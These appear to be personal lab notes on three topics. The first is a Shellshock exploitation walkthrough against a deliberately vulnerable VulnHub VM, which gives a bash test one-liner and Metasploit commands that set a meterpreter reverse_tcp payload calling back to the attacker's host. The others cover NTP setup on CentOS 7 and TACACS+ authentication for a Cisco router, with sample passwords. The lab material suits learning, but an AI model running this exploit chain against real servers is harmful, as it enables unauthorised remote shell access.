ShellShock

Kali IP: 123.123.123.51
Victim IP:  123.123.123.52

Download The ShellShock VM from here:
https://download.vulnhub.com/pentesterlab/cve-2014-6271.iso

Install the VM from the download ISO,
Login

check shellsock by command:

check if the server is vulnerable with ShellShock by:

On the Victim PC
bash --version
env x='() { :;}; echo vulnerable' bash -c 'echo just a test shellshock'

On Kali
Open a Broswer:

http://123.123.123.52/cgi-bin/status

Login as root , Open a Terminal
service postgresql start

msfconsole

use exploit/multi/http/apache_mod_cgi_bash_env_exec
set LHOST 123.123.123.51
set RHOST 123.123.123.52
set TARGETURI /cgi-bin/status
set payload linux/x86/meterpreter/reverse_tcp

exploit

Get in Success...!

Install NTP Server And Client On CentOS 7

NTP Server01 IP: 123.123.123.150
NTP Client IP: 123.123.123.151

1. Install NTP Server on CentOS 7
yum -y install ntp

vi /etc/ntp.conf
server 0.kh.pool.ntp.org
server 0.asia.pool.ntp.org
server 2.asia.pool.ntp.org  
logfile /var/log/ntp.log

firewall-cmd --add-service=ntp --permanent
firewall-cmd --reload

After you have opened Firewall port 123,
Start NTP server and make sure you enable it system-wide.
Use the following commands to manage the service.
systemctl restart ntpd
systemctl enable ntpd
systemctl status ntpd

After NTP daemon has been started,
wait a few minutes for the server to synchronize time with its pool list servers,
then run the following commands to verify NTP peers synchronization status and your system time.
ntpq -p
date -R

ntpdate -q  0.kh.pool.ntp.org  0.asia.pool.ntp.org

2. Configure NTP Client on CentOS 7
vim /etc/hosts
123.123.123.150 ntpsvr01        ntpsvr01.vnkk.net

yum -y install ntp

vim /etc/ntp.conf
server ntpsvr01.vnkk.net
server ntpsvr02.vnkk.net
logfile /var/log/ntp.log

systemctl restart ntpd
systemctl enable ntpd
systemctl status ntpd

ntpdate –u ntpsvr01.vnkk.net
ntpdc -c sysinfo

Tacacs With CISCO Device Authentication

1. Tacacs With CISCO Device Authentication
1.1. Static IP
1.2 Install Tacac On Ubuntu Server 14.04
1.3 Generate a password for Enable
1.4 Configire Tacacs
1.5 Create users in Linux System And Set Password For Users

2. Configure On Router (c3600)
2.1 Set IP Address And Add Tacacs Server
2.2 Test Login

Tacac Server IP: 123.123.123.55
Router IP: 123.123.123.56

123.123.123.55                                                        123.123.123.56
tacacs-svr (eth0)---------------------------------------------------(interface fa0/0) Router1


1. Tacacs With CISCO Device Authentication
1.1. Static IP

vi /etc/network/interfaces
auto eth0
iface eth0 inet static
address 123.123.123.55
netmask 255.255.255.0
gateway 123.123.123.2
dns-nameservers 123.123.123.2
dns-nameservers 8.8.8.8

vi /etc/hostname
tacacs-svr

vi /etc/hosts
127.0.1.1       tacacs-svr
123.123.123.55  tacacs-svr

vi /etc/resolv.conf
nameserver 123.123.123.2
search localdomain

1.2 Install Tacac On Ubuntu Server 14.04
Installations
apt-get install tacacs+

1.3 Generate a password for Enable

root@tacacs-svr:~# tac_pwd
Password to be encrypted: vannak123
ir0SF/mM8ddFI
root@tacacs-svr:~#

1.4 Configire Tacacs
cp /etc/tacacs+/tac_plus.conf /etc/tacacs+/tac_plus.conf.original
touch /var/log/tac_plus.acct

vim /etc/tacacs+/tac_plus.conf
With content:
#################### CONFIG #######################
key = tacacs123
accounting syslog;
accounting file = /var/log/tac_plus.acct
###################### ACL ########################
acl = network_admin {
        # allow access from all sources
        permit = .*
}
acl = support-team {
        # allow access to 123.123.123.56 only
        permit = 123\.123\.123\.56$
        }
#################### GROUP ########################
group = network_admin {
        default service = permit
        acl = network_admin
        service = exec {
        priv-lvl = 15
                }
        }
group = support-team {
        default service = deny
        acl = router-hq
        service = exec {
        priv-lvl = 0
        }
        cmd = enable {
                permit .*
        }
        cmd = show {
                permit .*
        }
        cmd = exit {
                permit .*
        }
}
#################### USER ########################
user = tacacadmin {
        login = file /etc/passwd
        member = network_admin
}
user = tacacuser1 {
        login = file /etc/passwd
        member = support-team
}
#################### ENABLE ########################
user = $enab15$ {
        login = des ir0SF/mM8ddFI
}

1.5 Create users in Linux System And Set Password For Users
useradd -m tacacadmin
passwd tacacadmin

useradd -m tacacuser1
passwd tacacuser1

2. Configure On Router (c3600)
2.1 Set IP Address And Add Tacacs Server 
Router>en
Router#configure terminal
Enter configuration commands, one per line.  End with CNTL/Z.
Router(config)#hostname R1
R1(config)#interface fastEthernet 0/0
R1(config-if)#ip address 123.123.123.56 255.255.255.0
R1(config-if)#no shutdown
R1(config-if)#end
R1#configure terminal
Enter configuration commands, one per line.  End with CNTL/Z.
R1(config)#aaa new-model
R1(config)#aaa authentication login default group tacacs+ enable
R1(config)#aaa authentication enable default group tacacs+ enable
R1(config)#aaa authentication commands 15 default group tacacs+ if-authenticated
R1(config)#tacacs-server host 123.123.123.55
R1(config)#tacacs-server key tacacs123
R1(config)#end
R1#configure terminal
Enter configuration commands, one per line.  End with CNTL/Z.
R1(config)#enable secret vannakenable
R1(config)#end
R1#configure terminal
Enter configuration commands, one per line.  End with CNTL/Z.
R1(config)#line console 0
R1(config-line)#password vannak0
R1(config-line)#end
R1#configure terminal
Enter configuration commands, one per line.  End with CNTL/Z.
R1(config)#line vty 0 15
R1(config-line)#password vannak015
R1(config-line)#end
R1#write
Building configuration...
[OK]
R1#

2.2 Test Login

Login with tacacadmin

Login with tacacuser1